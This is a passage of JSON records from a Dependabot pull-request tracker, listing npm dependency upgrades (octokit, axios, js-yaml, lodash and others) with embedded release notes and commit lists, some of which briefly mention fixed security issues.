href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/...\n\n_Description has been truncated_","html_url":"https://github.com/SherfeyInv/updater-action/pull/39","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/SherfeyInv%2Fupdater-action/issues/39","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/39/packages"}},{"old_version":"2.21.3","new_version":"14.0.0","update_type":"major","path":null,"pr_created_at":"2026-04-09T10:12:31.000Z","version_change":"2.21.3 → 14.0.0","issue":{"uuid":"4231349573","node_id":"PR_kwDONns3ec7RF0Om","number":38,"state":"open","title":"Bump the npm_and_yarn group across 1 directory with 29 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-04-09T10:12:31.000Z","updated_at":"2026-04-09T10:12:43.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":29,"packages":[{"name":"axios","old_version":"0.23.0","new_version":"1.13.5","repository_url":"https://github.com/axios/axios"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"node-forge","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/digitalbazaar/forge"},{"name":"@babel/traverse","old_version":"7.14.2","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@tootallnate/once","old_version":"1.1.2","new_version":"removed","repository_url":"https://github.com/TooTallNate/once"},{"name":"body-parser","old_version":"1.19.0","new_version":"1.20.4","repository_url":"https://github.com/expressjs/body-parser"},{"name":"express","old_version":"4.17.1","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.13","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"diff","old_version":"4.0.2","new_version":"4.0.4","repository_url":"https://github.com/kpdecker/jsdiff"},{"name":"flatted","old_version":"3.1.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"got","old_version":"9.6.0","new_version":"removed","repository_url":"https://github.com/sindresorhus/got"},{"name":"json5","old_version":"1.0.1","new_version":"1.0.2","repository_url":"https://github.com/json5/json5"},{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"minimatch","old_version":"3.0.4","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"picomatch","old_version":"2.3.0","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"tar-fs","old_version":"2.0.1","new_version":"2.1.4","repository_url":"https://github.com/mafintosh/tar-fs"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 19 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [axios](https://github.com/axios/axios) | `0.23.0` | `1.13.5` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [node-forge](https://github.com/digitalbazaar/forge) | `1.3.0` | `1.4.0` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.14.2` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `14.0.0` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [body-parser](https://github.com/expressjs/body-parser) | `1.19.0` | `1.20.4` |\n| [express](https://github.com/expressjs/express) | `4.17.1` | `4.22.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.13` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [diff](https://github.com/kpdecker/jsdiff) | `4.0.2` | `4.0.4` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.1.1` | `3.4.2` |\n| [got](https://github.com/sindresorhus/got) | `9.6.0` | `removed` |\n| [json5](https://github.com/json5/json5) | `1.0.1` | `1.0.2` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.18.1` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.0.4` | `3.1.5` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.0` | `2.3.2` |\n| [tar-fs](https://github.com/mafintosh/tar-fs) | `2.0.1` | `2.1.4` |\n\n\nUpdates `axios` from 0.23.0 to 1.13.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.13.5\u003c/h2\u003e\n\u003ch2\u003eRelease 1.13.5\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eSecurity:\u003c/strong\u003e Fixed a potential \u003cstrong\u003eDenial of Service\u003c/strong\u003e issue involving the \u003ccode\u003e__proto__\u003c/code\u003e key in \u003ccode\u003emergeConfig\u003c/code\u003e. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7369\"\u003e#7369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBug fix:\u003c/strong\u003e Resolved an issue where \u003ccode\u003eAxiosError\u003c/code\u003e could be missing the \u003ccode\u003estatus\u003c/code\u003e field on and after \u003cstrong\u003ev1.13.3\u003c/strong\u003e. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7368\"\u003e#7368\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanges\u003c/h3\u003e\n\u003ch4\u003eSecurity\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eFix Denial of Service via \u003ccode\u003e__proto__\u003c/code\u003e key in \u003ccode\u003emergeConfig\u003c/code\u003e. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7369\"\u003e#7369\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eFix/5657. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7313\"\u003e#7313\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure \u003ccode\u003estatus\u003c/code\u003e is present in \u003ccode\u003eAxiosError\u003c/code\u003e on and after v1.13.3. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7368\"\u003e#7368\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFeatures / Improvements\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd input validation to \u003ccode\u003eisAbsoluteURL\u003c/code\u003e. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7326\"\u003e#7326\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRefactor: bump minor package versions. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7356\"\u003e#7356\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDocumentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eClarify object-check comment. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7323\"\u003e#7323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix deprecated \u003ccode\u003eBuffer\u003c/code\u003e constructor usage and README formatting. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7371\"\u003e#7371\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCI / Maintenance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eChore: fix issues with YAML. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7355\"\u003e#7355\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCI: update workflow YAMLs. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7372\"\u003e#7372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCI: fix run condition. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7373\"\u003e#7373\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDev deps: bump \u003ccode\u003ekarma-sourcemap-loader\u003c/code\u003e from 0.3.8 to 0.4.0. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7360\"\u003e#7360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChore(release): prepare release 1.13.5. (PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7379\"\u003e#7379\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eNew Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sachin11063\"\u003e\u003ccode\u003e@​sachin11063\u003c/code\u003e\u003c/a\u003e (first contribution — PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7323\"\u003e#7323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/asmitha-16\"\u003e\u003ccode\u003e@​asmitha-16\u003c/code\u003e\u003c/a\u003e (first contribution — PR \u003ca href=\"https://redirect.github.com/axios/axios/pull/7326\"\u003e#7326\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/axios/axios/compare/v1.13.4...v1.13.5\"\u003ehttps://github.com/axios/axios/compare/v1.13.4...v1.13.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.13.4\u003c/h2\u003e\n\u003ch2\u003eOverview\u003c/h2\u003e\n\u003cp\u003eThe release addresses issues discovered in v1.13.3 and includes significant CI/CD improvements.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/axios/axios/compare/v1.13.3...v1.13.4\"\u003ev1.13.3...v1.13.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eWhat's New in v1.13.4\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003efix: issues with version 1.13.3\u003c/strong\u003e (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7352\"\u003e#7352\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/ee90dfc28abffbb61e24974b2bd3139a4a40ac76\"\u003eee90dfc\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eFixed issues discovered in v1.13.3 release\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/29f75425f0c9f73021f5eedc869c176e30e05fe7\"\u003e\u003ccode\u003e29f7542\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.13.5 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7379\"\u003e#7379\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/431c3a361490a2e3d5ac5d9e08d66d4bb5f3cd2a\"\u003e\u003ccode\u003e431c3a3\u003c/code\u003e\u003c/a\u003e ci: fix run condition (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7373\"\u003e#7373\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/9ff3a78ad72ecd665a4b673686f1517d824284bf\"\u003e\u003ccode\u003e9ff3a78\u003c/code\u003e\u003c/a\u003e ci: update ymls (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7372\"\u003e#7372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/265b71234c20fabbd6d691858c65a7e9c978659f\"\u003e\u003ccode\u003e265b712\u003c/code\u003e\u003c/a\u003e docs: fix deprecated Buffer constructor and formatting issues in README (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7371\"\u003e#7371\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/475e75a260668d227aec9f77735a49748c9041ff\"\u003e\u003ccode\u003e475e75a\u003c/code\u003e\u003c/a\u003e feat: add input validation to isAbsoluteURL (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7326\"\u003e#7326\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57\"\u003e\u003ccode\u003e28c7215\u003c/code\u003e\u003c/a\u003e fix: Denial of Service via \u003cstrong\u003eproto\u003c/strong\u003e Key in mergeConfig (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7369\"\u003e#7369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/04cf01969ed58f96920da032f340bfe4614aab90\"\u003e\u003ccode\u003e04cf019\u003c/code\u003e\u003c/a\u003e docs: clarify object check comment (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7323\"\u003e#7323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/696fa753c5366afbd21859c294c64c9ff2b359ab\"\u003e\u003ccode\u003e696fa75\u003c/code\u003e\u003c/a\u003e fix: status is missing in AxiosError on and after v1.13.3 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7368\"\u003e#7368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/569f028a5878faaec8d7d138ba686aac407bda4c\"\u003e\u003ccode\u003e569f028\u003c/code\u003e\u003c/a\u003e fix: added a option to choose between legacy and the new request/response int...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/44b7c9f0c4900fd8784f18e871199402f07fc69f\"\u003e\u003ccode\u003e44b7c9f\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump karma-sourcemap-loader (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7360\"\u003e#7360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v0.23.0...v1.13.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for axios since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 